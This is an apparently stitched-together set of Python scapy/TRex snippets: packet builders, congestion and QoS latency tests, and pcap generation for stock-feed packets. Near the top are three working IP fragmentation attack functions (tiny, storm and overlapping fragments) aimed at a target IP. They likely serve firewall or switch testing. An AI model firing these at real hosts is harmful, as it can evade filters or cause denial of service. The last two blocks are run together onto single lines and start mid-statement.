def get_sample_packet(self, pkt_type):
    """Return a sample scapy packet of the requested flavor.

    "tcp"      -> Ether/IP/TCP with a 1500-byte filler payload
    "gtpu-udp" -> Ether/IP/UDP with a GTP-U encapsulated inner IP/UDP packet
    anything else -> plain Ether/IP/UDP
    """
    outer = Ether() / IP(src=SOURCE_IP, dst=DEST_IP)
    filler = "*" * 1500
    if pkt_type == "tcp":
        return outer / TCP() / filler
    if pkt_type == "gtpu-udp":
        # GTP-U tunnel carrying an inner IP/UDP packet.
        return outer / UDP() / GTPU() / IP() / UDP() / filler
    return outer / UDP() / filler
def TinyFragmentAttack(Ip, Interface, PckNmb):
    """Send a tiny-fragment attack toward *Ip* out of *Interface*.

    A UDP datagram with ``"abcdefgh" * PckNmb`` bytes of payload is split
    into minimum-size IP fragments (fragsize=1) and transmitted, followed
    by one terminating fragment. Always returns 0.
    """
    # Every fragment shares IP id 222; flags="MF" marks "more fragments".
    for p in fragment(IP(dst=Ip, flags="MF", id=222) / UDP() /
                      Raw(load="abcdefgh" * PckNmb), fragsize=1):
        send(p, iface=Interface, verbose=0)
    # After the loop `p` is the last fragment sent: bump its offset by one
    # unit (fragment offsets are in 8-byte units) and clear MF so it acts
    # as the final fragment, then send it to trigger reassembly.
    p.frag += 1
    p.flags = 0
    send(p, iface=Interface, verbose=0)
    return 0
def StormFragmentAttack(Ip, Interface, PckNmb):
    """Flood *Ip* with IP fragments of a large UDP datagram.

    The payload is ``"a" * 1472 * PckNmb`` bytes, fragmented with scapy's
    default fragment size; all fragments are sent on *Interface*, followed
    by one far-offset terminating fragment. Always returns 0.
    """
    # Every fragment shares IP id 222; flags="MF" marks "more fragments".
    for p in fragment(
            IP(dst=Ip, flags="MF", id=222) / UDP() /
            Raw(load="a" * 1472 * PckNmb)):
        send(p, iface=Interface, verbose=0)
    # Push the last fragment 185 offset units further out (185 * 8 = 1480
    # bytes) and clear MF so it terminates reassembly with a gap.
    p.frag += 185
    p.flags = 0
    send(p, iface=Interface, verbose=0)
    return 0
def TinyOverlappingFragmentAttack(Ip, Interface, PckNmb):
    """Send overlapping tiny fragments of a UDP/80 datagram to *Ip*.

    The payload ``"abcdefgh" * PckNmb`` is split into fragsize=3 fragments;
    each fragment's offset is shifted back one unit before sending so
    consecutive fragments overlap. A terminating fragment follows.
    Always returns 0.
    """
    for p in fragment(IP(dst=Ip, flags="MF", id=222) / UDP(dport=80) /
                      Raw(load="abcdefgh" * PckNmb), fragsize=3):
        # Pull the fragment back by one 8-byte offset unit so it overlaps
        # the previously sent fragment.
        p.frag -= 1
        send(p, iface=Interface, verbose=0)
    # Restore the last fragment's original offset, clear MF, and resend it
    # as the terminating fragment.
    p.frag += 1
    p.flags = 0
    send(p, iface=Interface, verbose=0)
    return 0
def start(self, args) -> None:
    """Run the congestion test.

    Blasts a continuous 1500-byte UDP stream at 100% rate from the sender
    ports for ``args.duration`` seconds while capturing INT report packets
    (udp/32766) arriving on the collector ports, then analyzes the
    resulting pcap and prints per-port statistics.
    """
    # Congestion-inducing packet: fixed Ethernet/IP header plus filler.
    pkt = (
        Ether(src=SOURCE_MAC, dst=DEST_MAC)
        / IP(src=SOURCE_IP, dst=DEST_IP)
        / UDP()
        / ("*" * 1500)
    )
    # Continuous-transmit stream; vm=[] means no field-engine rewriting.
    stream = STLStream(packet=STLPktBuilder(pkt=pkt, vm=[]), mode=STLTXCont())
    logging.info("Setting up ports")
    self.client.add_streams(stream, ports=SENDER_PORTS)
    # Capture budget: 3 packets per second of test duration.
    pkt_capture_limit = args.duration * 3
    logging.info(
        "Start capturing first %s RX packet from INT collector", pkt_capture_limit
    )
    # NOTE(review): INT_COLLECTPR_PORTS looks like a typo of
    # INT_COLLECTOR_PORTS, but it must match the constant's definition
    # elsewhere in this file/module — do not rename here alone.
    self.client.set_service_mode(ports=INT_COLLECTPR_PORTS, enabled=True)
    capture = self.client.start_capture(
        rx_ports=INT_COLLECTPR_PORTS,
        limit=pkt_capture_limit,
        bpf_filter="udp and dst port 32766",
    )
    logging.info(
        "Starting traffic, duration: %ds, throughput: 100%%", args.duration
    )
    self.client.start(ports=SENDER_PORTS, mult="100%", duration=args.duration)
    logging.info("Waiting until all traffic stop")
    self.client.wait_on_traffic(ports=SENDER_PORTS)
    logging.info("Stop capturing packet from INT collector port")
    # Timestamped output path, e.g. /tmp/congestion-report-20240101-120000.pcap
    output = "/tmp/congestion-report-{}.pcap".format(
        datetime.now().strftime("%Y%m%d-%H%M%S")
    )
    self.client.stop_capture(capture["id"], output)
    analysis_report_pcap(output)
    list_port_status(self.client.get_stats())
def start(self, args: dict) -> None:
    """Run the priority (QoS) scheduling test.

    Sends three continuous streams from port 0:
      * s1 - delay-critical stream WITH QoS (1% rate, pg_id 1)
      * s2 - delay-critical stream WITHOUT QoS (1% rate, pg_id 2)
      * s3 - lower-priority background stream (98% rate, pg_id 3)

    After traffic stops, prints flow and latency statistics for s1/s2 and
    asserts that s2's max latency exceeds s1's by at least
    ``LATENCY_LP_MAX_USEC - LATENCY_DC_MAX_USEC``.

    :param args: parsed CLI arguments; only ``args.duration`` (seconds) is used.
    """
    # Three 1500-byte UDP packets, one per stream, distinguished by IP pair.
    pkt1 = Ether(dst=DEST_MAC) / IP(src="16.0.0.1", dst="48.0.0.1") / UDP(
        dport=12, sport=1025) / ("*" * 1500)
    pkt2 = Ether(dst=DEST_MAC) / IP(src="16.0.0.2", dst="48.0.0.2") / UDP(
        dport=12, sport=1025) / ("*" * 1500)
    pkt3 = Ether(dst=DEST_MAC) / IP(src="16.0.0.3", dst="48.0.0.3") / UDP(
        dport=12, sport=1025) / ("*" * 1500)

    # s1: delay-critical stream with QoS.
    s1 = STLStream(packet=STLPktBuilder(pkt=pkt1),
                   mode=STLTXCont(percentage=1),
                   flow_stats=STLFlowLatencyStats(pg_id=1))
    # s2: delay-critical stream without QoS.
    s2 = STLStream(packet=STLPktBuilder(pkt=pkt2),
                   mode=STLTXCont(percentage=1),
                   flow_stats=STLFlowLatencyStats(pg_id=2))
    # s3: lower-priority stream consuming the remaining bandwidth.
    s3 = STLStream(packet=STLPktBuilder(pkt=pkt3),
                   mode=STLTXCont(percentage=98),
                   flow_stats=STLFlowLatencyStats(pg_id=3))

    # Prepare ports and attach all three streams to the TX port.
    self.client.reset(ports=[0, 1])
    streams = [s1, s2, s3]
    self.client.add_streams(streams, ports=[0])

    logging.info(
        "Starting traffic, duration: %d sec", args.duration,
    )
    # Start sending traffic and wait for completion.
    self.client.start(SENDER_PORT, mult="100%", duration=args.duration)
    pgids = self.client.get_active_pgids()
    logging.info("Waiting until all traffic stop")
    self.client.wait_on_traffic(ports=SENDER_PORT)

    # Per-packet-group stats for the latency streams (pg_id 1 and 2).
    stats = self.client.get_pgid_stats(pgids['latency'])
    flow_stats_1 = stats['flow_stats'].get(1)
    flow_stats_2 = stats['flow_stats'].get(2)
    global_lat_stats = stats['latency']
    lat_stats_1 = global_lat_stats.get(1)
    lat_stats_2 = global_lat_stats.get(2)

    # TX counters are keyed by TX port (0), RX counters by RX port (1).
    tx_pkts_1 = flow_stats_1['tx_pkts'].get(0, 0)
    rx_pkts_1 = flow_stats_1['rx_pkts'].get(1, 0)
    # BUG FIX: the "tx bytes" prints referenced undefined tx_pps_1/tx_pps_2
    # (NameError); read the byte counters from the flow stats instead.
    tx_bytes_1 = flow_stats_1['tx_bytes'].get(0, 0)
    drops_1 = lat_stats_1['err_cntrs']['dropped']
    tx_pkts_2 = flow_stats_2['tx_pkts'].get(0, 0)
    rx_pkts_2 = flow_stats_2['rx_pkts'].get(1, 0)
    tx_bytes_2 = flow_stats_2['tx_bytes'].get(0, 0)
    drops_2 = lat_stats_2['err_cntrs']['dropped']

    print(
        " \n TX and RX flow stats and packets dropped for s1 "
        "(i.e., delay critical): "
    )
    print(" tx packets: {0}".format(tx_pkts_1))
    print(" tx bytes : {0}".format(tx_bytes_1))
    print(" rx packets : {0}".format(rx_pkts_1))
    print(" drops: {0}".format(drops_1))
    print(
        " \n TX and RX flow stats and packets dropped for s2 "
        "(i.e., delay critical): "
    )
    print(" tx packets: {0}".format(tx_pkts_2))
    print(" tx bytes : {0}".format(tx_bytes_2))
    print(" rx packets : {0}".format(rx_pkts_2))
    print(" drops: {0}".format(drops_2))

    # Latency summaries (usec) for s1.
    lat_1 = lat_stats_1['latency']
    avg_1 = lat_1['average']
    tot_max_1 = lat_1['total_max']
    tot_min_1 = lat_1['total_min']
    # Latency summaries (usec) for s2.
    lat_2 = lat_stats_2['latency']
    avg_2 = lat_2['average']
    tot_max_2 = lat_2['total_max']
    tot_min_2 = lat_2['total_min']

    print('\n Latency info for s1 (ie., delay critical with QoS):')
    print(" Maximum latency(usec): {0}".format(tot_max_1))
    print(" Minimum latency(usec): {0}".format(tot_min_1))
    print(" Average latency(usec): {0}".format(avg_1))
    print('\n Latency info for s2 (ie., delay critical without QoS):')
    print(" Maximum latency(usec): {0}".format(tot_max_2))
    print(" Minimum latency(usec): {0}".format(tot_min_2))
    print(" Average latency(usec): {0}".format(avg_2))

    # Max-latency gap between the delay-critical streams s1 and s2; the
    # QoS stream must win by at least the configured margin.
    dc_max_lat_diff = tot_max_2 - tot_max_1
    assert ((LATENCY_LP_MAX_USEC - LATENCY_DC_MAX_USEC) <= dc_max_lat_diff), \
        "Priority scheduling test failed."

    # Overall statistics for the TX (0) and RX (1) ports.
    stats = self.client.get_stats()
    readable_stats_0 = get_readable_port_stats(stats[0])
    readable_stats_1 = get_readable_port_stats(stats[1])
    logging.info("Priority scheduling test successfully executed.")
    print("\n Overall Statistics for TX port: \n")
    print(readable_stats_0)
    print("\n Overall Statistics for RX port: \n")
    print(readable_stats_1)
'00').decode("hex") if five_sell_price >= 1000: five_sell_price_pkt = (five_sell_price_str + '00').decode("hex") elif five_sell_price < 1000 and five_sell_price >= 100: five_sell_price_pkt = ('0' + five_sell_price_str + '00').decode("hex") elif five_sell_price < 100 and five_sell_price >= 10: five_sell_price_pkt = ('00' + five_sell_price_str + '00').decode("hex") elif five_sell_price < 10: five_sell_price_pkt = ('000' + five_sell_price_str + '00').decode("hex") pkt = (Ether(src=src_mac_addr, dst=dst_mac_addr) / IP(src=src_ip_addr, dst=dst_ip_addr) / UDP(sport=ip_sport_no, dport=ip_dport_no) / format_six_esc_code_string / payload_len_str / format_six_type_string / format_six_string / format_six_version_string / format_six_seq_num_string / format_six_stock_id / format_six_transction_time_final_string / for_mat_six_ob / for_mat_six_ud_string / for_mat_six_state_string / for_mat_six_Qty_pkt / one_buy_price_pkt / one_buy_Qty_pkt / two_buy_price_pkt / two_buy_Qty_pkt / three_buy_price_pkt / three_buy_Qty_pkt / four_buy_price_pkt / four_buy_Qty_pkt / five_buy_price_pkt / five_buy_Qty_pkt / one_sell_price_pkt / one_sell_Qty_pkt / two_sell_price_pkt / two_sell_Qty_pkt / three_sell_price_pkt / three_sell_Qty_pkt / four_sell_price_pkt / four_sell_Qty_pkt / five_sell_price_pkt / five_sell_Qty_pkt / checksum / terminalcode) pkt.time = pkt_timestamp
for i in range(int(pkt_length)): payload_data = payload_data + 'A' # Payload contents are not important. pkts_tcp = [] #A simple TCP/IP packet embedded in an Ethernet II frame for i in range(int(no_pkt)): pkt = (Ether(src=src_mac_addr, dst=dst_mac_addr) / IP(src=src_ip_addr, dst=dst_ip_addr) / TCP(sport=ip_sport_no, dport=ip_dport_no) / payload_data) pkts_tcp.append(pkt) pkts_udp = [] #A simple UDP/IP packet embedded in an Ethernet frame for i in range(int(no_pkt)): pkt = (Ether(src=src_mac_addr, dst=dst_mac_addr) / IP(src=src_ip_addr, dst=dst_ip_addr) / UDP(sport=ip_sport_no, dport=ip_dport_no) / payload_data) pkt.time = pkt_timestamp pkts_udp.append(pkt) if (args.packet_type == 'tcp' or args.packet_type == 'TCP'): pkts = pkts_tcp else: pkts = pkts_udp #Select packet type for axi stream data generation wrpcap(os.path.join(script_dir, '%s.cap' % (str(pcap_name))), pkts) print '\nFinish packet generation!\n'